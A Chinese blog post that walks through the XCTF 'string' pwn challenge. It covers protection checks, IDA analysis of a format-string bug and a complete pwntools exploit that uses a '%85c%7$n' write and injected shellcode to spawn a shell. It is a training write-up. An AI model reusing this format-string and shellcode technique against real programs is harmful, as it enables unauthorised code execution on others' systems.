攻防世界 Pwn string

最新推荐文章于 2022-11-05 18:25:06 发布
原创 最新推荐文章于 2022-11-05 18:25:06 发布 · 211 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

本文详细分析了一道信息安全题目,涉及内存分配、函数调用和保护机制。通过检查sec发现除PIE外其他保护开启。IDA分析源码揭示了可能存在格式化字符串漏洞,特别是在sub_400BB9函数中。通过构造特定输入,可以实现内存空间的任意写操作,最终在sub_400CA6函数中利用这个漏洞打shellcode。提供了一个完整的exploit代码示例,成功执行后获取shell。博客还给出了题目下载链接。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

攻防世界 Pwn string

1.checksec看一下保护

在这里插入图片描述
除了PIE其他保护都开了

2.IDA分析一下源码

在这里插入图片描述
v3申请了8大小的内存空间,然后在前4个空间中存放了数字68,在后四个空间中存放了数字85。而v4中存放的是v3的内容,并不是68和85两个数字,而是存放了两个数字的内存空间地址。

3. 看一下sub_400D72函数

在这里插入图片描述
这里使用了scanf(%s)函数,看起来是危险函数,但是对输入的长度做了限制,并且设置了canary保护,实际是不可以利用的漏洞

4.再看一下其他的函数sub_400A7D

在这里插入图片描述
这里输入只能选east,再接着看其他函数

5.看一下sub_400BB9函数

在这里插入图片描述
这个地方选1的话会输入一个地址,第二个输入点存在格式化字符串漏洞,我们可以对某一空间进行任意写的操作,然后我们接着看第三个调用的函数

6.看一下sub_400CA6

在这里插入图片描述
其中a1存放的是v3的地址,就是我们v3申请的内存大小为8的内存空间。理顺思路,这里如果我们可以使这8内存的空间中的前四个字节和后四个字节相等,就可以打shellcode。于是我们可以理顺思路,在最开始时拿到两个4字节的地址->v3[0]和v3[1]的地址,然后在之后的函数中将其中一个修改成和另一个相同->再在此处打shellcode。exp如下:

7.exp附上

from pwn import *
#p = remote("111.198.29.45","49404")
p = process("./string")
context(arch='amd64', os='linux', log_level='debug')
p.recvuntil('secret[0] is ')
v4_addr = int(p.recvuntil('\n')[:-1], 16)
p.sendlineafter("What should your character's name be:", 'cxk')
p.sendlineafter("So, where you will go?east or up?:", 'east')
p.sendlineafter("go into there(1), or leave(0)?:", '1')
p.sendlineafter("'Give me an address'", str(int(v4_addr)))
p.sendlineafter("And, you wish is:", '%85c%7$n')
shellcode = asm(shellcraft.sh())
p.sendlineafter("USE YOU SPELL", shellcode)
p.interactive()

8.运行exp

在这里插入图片描述

9.题目下载地址

点击下载

攻防世界pwn-string
a_silly_coder的博客
05-18 432
首先检查保护 将文件拖入64位ida 查看代码逻辑,发现这个代码有些复杂,但是大多数都是无效信息,很多输入都是指引程序进行的,扰乱我们的视线。 关键信息有:v3v4的数值地址都给出来了,然后查看sub_400D72函数 这里首先输入一个name,这是干扰输入,只要不超过0xC的长度即可。然后sub_400A7D也是干扰输入,只需要跟着代码输入就可以了。接着查看sub_400BB9与sub_400CA6 sub_400BB9这里很显然是有一个格式化字符串漏洞。 接着看s...
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1587
学习pwn开始,慢慢来不要急
攻防世界-pwn-String
weixin_44558065的博客
10-19 387
本人为萌新,以下只是个人看法。
攻防世界 pwn string
N1rvana的博客
11-15 4441
攻防世界string应该是新手区数一数二的难题,难点在理解程序流程。 先观察主函数: alarm函数 什么是alarm函数? 如上图所示,在做一些pwn题的时候,我们有时会遇到alarm(0x3Cu)函数。alarm函数中的参数0x3Cu是十六进制无符号数,即十进制对应60,所以该函数的作用是在程序运行60秒后,给进程发送SIGALRM信号,如果不另编写程序接受处理此信号,则默认结束此程序。 为什么要使用alarm函数? 一是比赛中常要远程连接服务器解题,官方不希望有队伍长时间解不出来题浪费服务器资源 二
攻防世界pwn——string
qq_62076255的博客
11-05 821
攻防世界pwn——string
攻防世界PWN-string
Deeeelete的博客
11-15 837
题目:string 进PE或者checksec 64位程序 堆栈不可执行以及栈保护 运行一遍好像是一个文字游戏 剧情游戏?分析一波主要任务分支: 情况1:开始游戏,啥也不输入,60秒之后程序自动关闭 情况2:开始游戏,输入名称,名称超过了12个字符,直接出局 情况3:开始游戏,输入小于12个字符的名称,进入剧情问我走east还是up,如果选择up程序会一直死循环 情况4:开始游戏,输入小于12个字符的名称,进入剧情走east,然后问我选择1还是0,选择0,原地暴毙 情况5:开始游
攻防世界pwn新手区整理
Lenard404的博客
08-19 3335
小白尝试做pwn题QAQ get shell 惯例: IDA查看main函数: 显然直接连接就可以得到权限。 nc ls cat 一条龙服务: 菜鸟教程的Linux命令大全 hello pwn 惯例: IDA查看main: 查看if语句后的函数: 目的明确:进入if语句。 计算60106C和601068的偏移为4,read可以读入0x10,直接输入条件即可。 exp: from pwn import* r = remote('111.200.241.244',64067) payload = '
pwn攻防世界 pwn新手区wp
woodwhale的博客
08-10 7367
pwn攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
攻防世界 pwn练习区解法 write up
qq_46441427的博客
02-16 923
checksec stack: canary found 是指运行程序时,会把canary取出放入一个rbp定向的值,在退出函数前将rbp定向的值和canary的值进行一个比较(异或一下,看是不是0),如果不相等,则运行_stack_chk_fail函数 NX 数据所在的内存为不可执行,程序溢出转为shellcode时,程序会去在数据页面上执行指令,这个时候CPU抛出异常,不会让它执行 PIE 程序装在随机的地址 ASLR 即使文件开启了PIE保护,还需要开启ASLR才会真正打乱基址 ...
[PWN](攻防世界)string
ljh15937的博客
09-21 1327
分析程序漏洞 了解程序的基本信息 64位小端序 开启了 Canary 保护,栈不可执行,未开启 PIE, 使用 IDA Pro 进行静态分析,由于该程序的执行流较为复杂,需要花些时间理清程序的具体执行流程 使用 GDB 进行动态调试,设置断点执行到 printf(&format, &format);,可以发现输入的地址 0xa98ac7 在栈顶的第二个8字节,根据64位程序的传参方式,该地址是格式化字符串的第 7 个参数,printf() 函数的第 8 个参数。
攻防世界 - pwn - string
qq726232111的博客
03-25 550
A、程序分析 1、mov eax, ds:stdin@@GLIBC_2_0 mov [esp+8], eax ; stream mov dword ptr [esp+4], 64h ; n lea eax, [esp+9Ch+s] mov [esp], eax ; s call ...
攻防世界pwn新手练习(string
BurYiA的博客
12-25 1792
string 首先我们看一下程序的保护机制 程序开了NX(堆栈不可执行)、CANARY(栈保护)和PELRO 程序太长了,我们就不运行了,在IDA中我们查一下有没有什么明显的地方 在这个函数里面 我们发现了一个格式化字符串漏洞,在他的上面有两个输入点,一个是“%ld”格式,一个是“%s”格式 我们在往下看,紧接着的函数里有这么一个东西 代码执行,条件是a1这个数组里面的第一个数字等于第二个数字 ...
攻防世界新手区—string
hanabi_sh
10-15 701
攻防世界string,格式化字符漏洞
攻防世界string
qq_25044201的博客
12-30 237
这道题是我在新手区见到的最难的一道题,涉及了格式化字符串,shellcode注入,最难的还是这个过程。繁杂,琐屑。 这句是最关键的,创建个内存然后作为指针函数。这里注入shellcode就可以。但是有个前提a[0]=a[1]我们要通过格式化字符串修改a[0]=85使得a[0]=a[1] ...
攻防世界 string
BengDouLove的博客
03-22 1256
这回终于做上了一道像一个小系统一样的题,有很多输入输出,程序逻辑也复杂了一点,比赛中我看都是这样的题,一直以来遇到这样的题都是不知所措,从这一道开始练手把 这是一个文字版RPG game… 一开始看main函数看不出来什么,注意到输出了secret 输出secret之后进入另一个函数,将v4的值传了进去 然后让输入名字,这里好像没有溢出,名字长度小于12 输入名字之后进入三个函数的第一个,开始...
攻防世界STRing
WangLal的博客
07-06 381
攻防世界PWN String的WP 基本的三步checksec,file,执行文件 这是一个64位文件,只有pIE没开。 由string这个题目猜测可能会是字符串漏洞 将下载好的附件扔进IDA里查看,点击main函数 main函数中找不到,那就在其他函数看一下。 点击 sub_400D72 要进入if条件中,输入的s的长度需小于12位 在sub_400BB9函数中看到了 printf前几句中存在%s与%ld,可以操作. 继续看下一个函数 (a1+4是指a1加4个字节,也就是一个整数类型所以这个就是a
[攻防世界]string
逆向萌新的博客
06-20 288
[攻防世界]string详解
攻防世界pwn类题中string
05-11
攻防世界Pwn类题目中,`string`通常是指一个用于存储字符串的字符数组或指针,是一个C语言中常见的数据类型。在Pwn类题目中,`string`往往是一个非常重要的数据结构,因为大多数漏洞都与字符串的处理有关。例如,`strcpy`和`strcat`等字符串处理函数容易导致缓冲区溢出漏洞,而使用`printf`函数时,如果格式字符串中包含了`%s`等字符串格式化符号,也容易导致格式化字符串漏洞。因此,在Pwn类题目中,正确地处理字符串是非常重要的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值